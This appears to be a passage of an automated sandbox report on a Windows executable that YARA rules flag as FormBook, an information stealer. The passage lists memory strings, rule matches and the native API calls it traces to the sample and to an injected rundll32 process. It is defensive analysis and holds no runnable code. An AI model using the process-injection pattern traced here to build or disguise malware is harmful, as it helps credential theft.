          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FC2
          Source: PQMW0W5h3X.exe, 00000000.00000002.334621545.000000000073A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004181D0 NtCreateFile,2_2_004181D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00418280 NtReadFile,2_2_00418280
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00418300 NtClose,2_2_00418300
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,2_2_004183B0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00418222 NtCreateFile,2_2_00418222
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004183AA NtAllocateVirtualMemory,2_2_004183AA
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00A498F0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,2_2_00A49860
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49840 NtDelayExecution,LdrInitializeThunk,2_2_00A49840
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A499A0 NtCreateSection,LdrInitializeThunk,2_2_00A499A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00A49910
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A20 NtResumeThread,LdrInitializeThunk,2_2_00A49A20
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00A49A00
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A50 NtCreateFile,LdrInitializeThunk,2_2_00A49A50
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A495D0 NtClose,LdrInitializeThunk,2_2_00A495D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49540 NtReadFile,LdrInitializeThunk,2_2_00A49540
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00A496E0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00A49660
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00A497A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,2_2_00A49780
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,2_2_00A49FE0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,2_2_00A49710
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A498A0 NtWriteVirtualMemory,2_2_00A498A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49820 NtEnumerateKey,2_2_00A49820
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4B040 NtSuspendThread,2_2_00A4B040
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A499D0 NtCreateProcessEx,2_2_00A499D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49950 NtQueueApcThread,2_2_00A49950
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A80 NtOpenDirectoryObject,2_2_00A49A80
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49A10 NtQuerySection,2_2_00A49A10
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4A3B0 NtGetContextThread,2_2_00A4A3B0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49B00 NtSetValueKey,2_2_00A49B00
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A495F0 NtQueryInformationFile,2_2_00A495F0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49520 NtWaitForSingleObject,2_2_00A49520
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4AD30 NtSetContextThread,2_2_00A4AD30
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49560 NtWriteFile,2_2_00A49560
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A496D0 NtCreateKey,2_2_00A496D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49610 NtEnumerateValueKey,2_2_00A49610
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49670 NtQueryInformationProcess,2_2_00A49670
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49650 NtQueryValueKey,2_2_00A49650
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49730 NtQueryVirtualMemory,2_2_00A49730
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4A710 NtOpenProcessToken,2_2_00A4A710
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49760 NtOpenProcess,2_2_00A49760
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A49770 NtSetInformationFile,2_2_00A49770
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A4A770 NtOpenThread,2_2_00A4A770
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004181D0 NtCreateFile,2_1_004181D0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00418280 NtReadFile,2_1_00418280
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00418300 NtClose,2_1_00418300
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004183B0 NtAllocateVirtualMemory,2_1_004183B0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00418222 NtCreateFile,2_1_00418222
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004183AA NtAllocateVirtualMemory,2_1_004183AA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9540 NtReadFile,LdrInitializeThunk,4_2_045F9540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F95D0 NtClose,LdrInitializeThunk,4_2_045F95D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9650 NtQueryValueKey,LdrInitializeThunk,4_2_045F9650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_045F9660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F96D0 NtCreateKey,LdrInitializeThunk,4_2_045F96D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_045F96E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9710 NtQueryInformationToken,LdrInitializeThunk,4_2_045F9710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9FE0 NtCreateMutant,LdrInitializeThunk,4_2_045F9FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9780 NtMapViewOfSection,LdrInitializeThunk,4_2_045F9780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9840 NtDelayExecution,LdrInitializeThunk,4_2_045F9840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_045F9860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_045F9910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F99A0 NtCreateSection,LdrInitializeThunk,4_2_045F99A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A50 NtCreateFile,LdrInitializeThunk,4_2_045F9A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9560 NtWriteFile,4_2_045F9560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FAD30 NtSetContextThread,4_2_045FAD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9520 NtWaitForSingleObject,4_2_045F9520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F95F0 NtQueryInformationFile,4_2_045F95F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9670 NtQueryInformationProcess,4_2_045F9670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9610 NtEnumerateValueKey,4_2_045F9610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FA770 NtOpenThread,4_2_045FA770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9770 NtSetInformationFile,4_2_045F9770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9760 NtOpenProcess,4_2_045F9760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FA710 NtOpenProcessToken,4_2_045FA710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9730 NtQueryVirtualMemory,4_2_045F9730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F97A0 NtUnmapViewOfSection,4_2_045F97A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FB040 NtSuspendThread,4_2_045FB040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9820 NtEnumerateKey,4_2_045F9820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F98F0 NtReadVirtualMemory,4_2_045F98F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F98A0 NtWriteVirtualMemory,4_2_045F98A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9950 NtQueueApcThread,4_2_045F9950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F99D0 NtCreateProcessEx,4_2_045F99D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A10 NtQuerySection,4_2_045F9A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A00 NtProtectVirtualMemory,4_2_045F9A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A20 NtResumeThread,4_2_045F9A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9A80 NtOpenDirectoryObject,4_2_045F9A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045F9B00 NtSetValueKey,4_2_045F9B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045FA3B0 NtGetContextThread,4_2_045FA3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C18280 NtReadFile,4_2_02C18280
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C183B0 NtAllocateVirtualMemory,4_2_02C183B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C18300 NtClose,4_2_02C18300
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C181D0 NtCreateFile,4_2_02C181D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C18222 NtCreateFile,4_2_02C18222
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02C183AA NtAllocateVirtualMemory,4_2_02C183AA
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004047D30_2_004047D3
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004061D40_2_004061D4
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0040102E2_2_0040102E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B8FB2_2_0041B8FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00408C6C2_2_00408C6C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00408C702_2_00408C70
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041B57A2_2_0041B57A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_0041C58A2_2_0041C58A
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A320A02_2_00A320A0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD20A82_2_00AD20A8
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1B0902_2_00A1B090
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD28EC2_2_00AD28EC
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ADE8242_2_00ADE824
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AC10022_2_00AC1002
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A241202_2_00A24120
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A0F9002_2_00A0F900
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD22AE2_2_00AD22AE
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A3EBB02_2_00A3EBB0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACDBD22_2_00ACDBD2
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD2B282_2_00AD2B28
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1841F2_2_00A1841F
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACD4662_2_00ACD466
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A325812_2_00A32581
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A1D5E02_2_00A1D5E0
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD25DD2_2_00AD25DD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A00D202_2_00A00D20
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD2D072_2_00AD2D07
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD1D552_2_00AD1D55
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD2EF72_2_00AD2EF7
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00A26E302_2_00A26E30
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00ACD6162_2_00ACD616
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_2_00AD1FF12_2_00AD1FF1
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0040102E2_1_0040102E
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_004010302_1_00401030
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_0041B8FB2_1_0041B8FB
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00408C6C2_1_00408C6C
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 2_1_00408C702_1_00408C70
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467D4664_2_0467D466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045C841F4_2_045C841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04681D554_2_04681D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04682D074_2_04682D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045B0D204_2_045B0D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046825DD4_2_046825DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CD5E04_2_045CD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E25814_2_045E2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045D6E304_2_045D6E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0467D6164_2_0467D616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04682EF74_2_04682EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04681FF14_2_04681FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468DFCE4_2_0468DFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0468E8244_2_0468E824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046710024_2_04671002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046828EC4_2_046828EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_046820A84_2_046820A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045CB0904_2_045CB090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_045E20A04_2_045E20A0
